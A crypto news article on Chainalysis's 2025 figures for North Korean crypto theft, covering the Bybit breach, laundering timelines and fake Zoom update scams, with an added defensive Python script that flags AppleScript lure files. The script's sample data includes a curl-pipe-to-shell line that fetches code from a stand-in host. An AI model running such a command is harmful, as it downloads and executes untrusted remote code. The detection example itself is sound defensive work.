North Korean Crypto Hacks Reach Record High in 2025 as Tactics Become More Targeted

North Korean hackers have stolen $2.02 billion in crypto this year, Chainalysis reports, as attacks shift to fewer but larger breaches targeting exchanges and users.


North Korean-linked hacking groups stole at least $2.02 billion in cryptocurrency during 2025, according to a new report from blockchain analytics firm Chainalysis. This is the largest annual amount ever tied to the regime and marks a sharp rise from previous years.

The total represents a 51% increase compared to 2024. It also brings the estimated cumulative amount stolen by North Korean cyber actors to $6.75 billion since tracking began. 

Chainalysis and other intelligence agencies believe much of this money is used to bypass international sanctions and fund the country’s nuclear weapons and ballistic missile programs.

Despite the surge in stolen value, the number of known attacks fell in 2025. According to Chainalysis, this shows a clear change in strategy. Instead of carrying out many small hacks, North Korean groups are focusing on fewer operations that cause much larger losses.

This shift was most visible in February 2025, when hackers breached the Bybit exchange and stole around $1.5 billion in a single attack. That one incident accounted for most of the crypto losses linked to North Korea this year. It also made up roughly 44% of all cryptocurrency stolen across the entire market in 2025.

Chainalysis said the trend points to a more patient and deliberate approach. Attackers are now prioritizing access to high-value targets instead of launching frequent low-impact attacks. The firm warned that both crypto companies and individual users need to adjust to a threat environment where trust and human behavior are being exploited more than software flaws.

Fewer Hacks Drive Larger Losses Across the Crypto Market

Chainalysis reported that total cryptocurrency theft reached more than $3.41 billion between January and early December 2025. This figure is slightly higher than the $3.38 billion recorded last year. While the increase appears small, the underlying details show a major change in how attacks are carried out.

A small number of large breaches drove most of the losses. The Bybit hack alone made up nearly half of all stolen crypto this year. Chainalysis said the top three hacks accounted for 69% of losses from crypto services, highlighting how damage is now concentrated in a handful of incidents.

Centralized crypto platforms continue to face serious risks, even with professional security teams in place. Chainalysis found that private key compromises were responsible for 88% of stolen funds in the first quarter of 2025. Once attackers gain access to a key, they can often move large sums quickly.

At the same time, attacks on individual users increased. Chainalysis said there was a noticeable rise in compromises involving personal wallets and private keys held on centralized services.

“Personal wallet compromises have grown substantially, increasing from just 7.3% of total stolen value in 2022 to 44% in 2024,” Chainalysis said.

In 2025, there were around 158,000 personal wallet compromise cases involving at least 80,000 unique victims. The total amount stolen from individuals fell to $713 million, down from $1.5 billion the year before. Chainalysis said this suggests attackers are stealing smaller amounts from more people instead of focusing on a few high-balance wallets.

The report also noted differences across blockchain networks. Ethereum and Tron had higher rates of victims per 100,000 wallets compared to networks such as Base and Solana. Chainalysis did not point to a single cause but said attacker familiarity and wallet usage patterns likely play a role.

Decentralized finance told a different story. DeFi-related losses remained relatively low, even as total value locked (TVL) recovered. This breaks from earlier cycles, where rising TVL often led to more successful attacks.

Chainalysis said this could signal real progress in DeFi security. The firm highlighted the September 2025 Venus Protocol incident as an example.

“The Venus Protocol incident of September 2025 exemplifies how improved security practices are making a tangible difference,” Chainalysis said.

Venus, which uses the Hexagate monitoring platform, detected unusual activity 18 hours before the attack. The protocol quickly paused operations and recovered funds within hours. Afterward, Venus passed a governance proposal to freeze $3 million controlled by the attacker. As a result, the attacker ended up losing money.

“The combination of proactive monitoring, rapid response capabilities, and governance mechanisms that can act decisively has made the ecosystem more agile and resilient,” Chainalysis said. “While attacks still occur, the ability to detect, respond, and even reverse them represents a fundamental shift from the early DeFi era when successful hacks often meant permanent losses.”

Social Engineering Replaces Code as the Main Point of Failure

The report also shows how North Korean hackers are changing the way they break into systems. Instead of focusing mainly on technical flaws, attackers are increasingly targeting people.

Chainalysis said one of the regime’s most effective tactics is placing fake IT workers inside crypto companies. These individuals apply for jobs, pass interviews, and work their way into trusted positions. Over time, they gain access to sensitive systems, private keys, or internal information.

Impersonation has also become more common. Hackers pose as executives, colleagues, or business partners to convince victims to share credentials or approve transactions. These social engineering tactics are often hard to detect and rely on building trust over time.

Chainalysis said this change highlights a growing problem across the industry. In many cases, the weakest link is no longer the code, but the people using it.

After stealing funds, North Korean hackers use structured laundering methods to hide their tracks. Chainalysis found that they often move stolen crypto through Chinese-language services, cross-chain bridges, and mixing protocols. Funds are broken into smaller transactions to avoid detection as they move across networks.

This approach differs from that of many other hacking groups. While most cybercriminals prefer lending protocols, peer-to-peer platforms, or exchanges without identity checks, North Korean actors often rely on dedicated services such as Huione.

Their laundering process usually unfolds over about 45 days. During the first five days, attackers quickly move funds away from the original theft using DeFi protocols and mixers. In the second week, they begin integrating the funds into the wider crypto ecosystem through bridges and no-KYC exchanges, while starting to move assets off-ramp.

Between days 20 and 45, the funds pass through less-regulated Chinese-language platforms and centralized exchanges. At this stage, attackers complete the conversion to fiat currency or other assets.

“As North Korea continues to use cryptocurrency theft to fund state priorities and circumvent international sanctions, the industry must recognize that this threat actor operates by different rules than typical cybercriminals,” Chainalysis said. “The challenge for 2026 will be detecting and preventing these high-impact operations before DPRK actors inflict another Bybit-scale incident.”

Fake Zoom Scams Expose Growing Risks for Individual Users

New reports also show that North Korean hackers are targeting individual investors more aggressively. One method involves fake Zoom or Microsoft Teams meetings designed to steal passwords and private keys. Security researchers estimate these scams have already drained more than $300 million from victims.

Cybersecurity firm Security Alliance, known as SEAL, said it has been tracking “multiple daily” attempts using this tactic. The warning followed disclosures from MetaMask security researcher Taylor Monahan.

“DPRK threat actors are still rekting way too many of you via their fake Zoom / fake Teams meets,” Monahan wrote. “They’re taking over your Telegrams -> using them to rekt all your friends. They’ve stolen over $300m via this method already.”

According to Monahan, the scam often begins with a message sent through Telegram. The message appears to come from someone the victim knows, often using an account with previous chat history. This helps lower suspicion.

The attacker then invites the victim to schedule a meeting through Calendly. When the Zoom call starts, the victim sees what looks like a real video meeting with familiar faces. While deepfake technology has been used in the past, Monahan said many recent attacks rely on pre-recorded videos instead.

During the call, the attacker complains about audio issues and asks the victim to download a file shared in the Zoom chat. Other people in the video appear confused or frustrated, adding pressure to comply.

The file is described as a software update meant to fix the problem. It is often named “Zoom Update SDK.scpt” and runs using AppleScript. In reality, the file contains malware, usually a Remote Access Trojan.

This malware allows attackers to access passwords, internal company information, and private keys. Over time, they drain the victim’s crypto wallets completely. “They will eventually take all your crypto,” Monahan said.

After gaining access, attackers often take over the victim’s Telegram account and use it to target friends and contacts with the same scam.

Monahan advised anyone who downloaded the file to immediately disconnect from the internet, turn off their computer, and stop using it. Victims should move crypto out of compromised wallets using a phone or tablet, then change all passwords and cloud access keys.

She also said users should wipe the affected computer before using it again. To secure Telegram accounts, victims should terminate all other sessions and enable or update multi-factor authentication.
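A defender-side triage check for the lure described above, written as an added example (not code from Chainalysis, SEAL or Taylor Monahan): it flags AppleScript files whose names imitate a meeting-app update, as the article's "Zoom Update SDK.scpt" does, and raises the severity when plain-text script source invokes a shell. The keyword list, the "do shell script" heuristic and the sample paths are assumptions.

```python
"""Triage check for the fake-meeting "software update" lure.

Added example, not code from Chainalysis, SEAL or Taylor Monahan. Flags
AppleScript files named like a Zoom/Teams update (the article's
"Zoom Update SDK.scpt") and, when source text is available, notes whether
it runs a shell command. Keyword list and shell heuristic are assumptions.
"""
import re
from pathlib import Path
from typing import Iterable, List, Optional, Tuple

SCRIPT_SUFFIXES = {".scpt", ".applescript"}
# Words a lure file name tends to carry; assumption, tune per environment.
LURE_WORDS = re.compile(r"zoom|teams|update|sdk|audio", re.IGNORECASE)
# AppleScript's statement for running shell commands; legitimate scripts use it
# too, so it is a reason to inspect, not proof of malware.
SHELL_CALL = re.compile(r"do\s+shell\s+script", re.IGNORECASE)

# Constructed sample: the article's lure name plus benign and text-source files.
SAMPLE: List[Tuple[str, Optional[str]]] = [
    ("/Users/alice/Downloads/Zoom Update SDK.scpt", None),
    ("/Users/alice/Downloads/notes.txt", None),
    ("/Users/alice/Downloads/teams-audio-fix.applescript",
     'do shell script "curl -fsSL https://update.invalid/fix | sh"'),
]


def is_lure_name(name: str) -> bool:
    """True if the file is an AppleScript whose name imitates a meeting update."""
    p = Path(name)
    return p.suffix.lower() in SCRIPT_SUFFIXES and LURE_WORDS.search(p.stem) is not None


def calls_shell(source: str) -> bool:
    """True if plain-text AppleScript source runs a shell command."""
    return SHELL_CALL.search(source) is not None


def triage(files: Iterable[Tuple[str, Optional[str]]]) -> List[dict]:
    """files: (path, source text or None). Findings sorted high severity first."""
    findings = []
    for path, source in files:
        if not is_lure_name(Path(path).name):
            continue
        shell = bool(source) and calls_shell(source)
        findings.append({"path": path, "shell_call": shell,
                         "severity": "high" if shell else "medium"})
    return sorted(findings, key=lambda f: (f["severity"] != "high", f["path"]))
```

To run it over a real folder such as ~/Downloads, feed `triage` the paths from `os.walk`; compiled `.scpt` files are binary, so only `.applescript` text sources are worth passing to the shell heuristic.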

North Korean hackers have been linked to many of the largest crypto hacks in history. One of the most well-known groups, Lazarus, has generated billions of dollars through repeated high-profile attacks. Just last month, the group was linked to a breach at Upbit, South Korea’s largest crypto exchange, which resulted in losses of about $30.6 million.

Chainalysis said North Korean hackers are also using fake job applications and interview processes to infiltrate crypto companies. As defenses at major platforms improve, attackers are increasingly turning to individuals and smaller teams as easier targets.

The 2025 data shows a clear pattern. Fewer attacks are causing far greater damage. With trust and human behavior now at the center of many breaches, the risks facing the crypto industry continue to evolve.

About Author

Dan K

Dan is a seasoned blockchain reporter and cryptocurrency enthusiast with a passion for making complex topics easily digestible for a broad audience. With years of experience covering the dynamic world of blockchain technology and digital assets, Dan has established himself as a respected voice in the CoinNews community.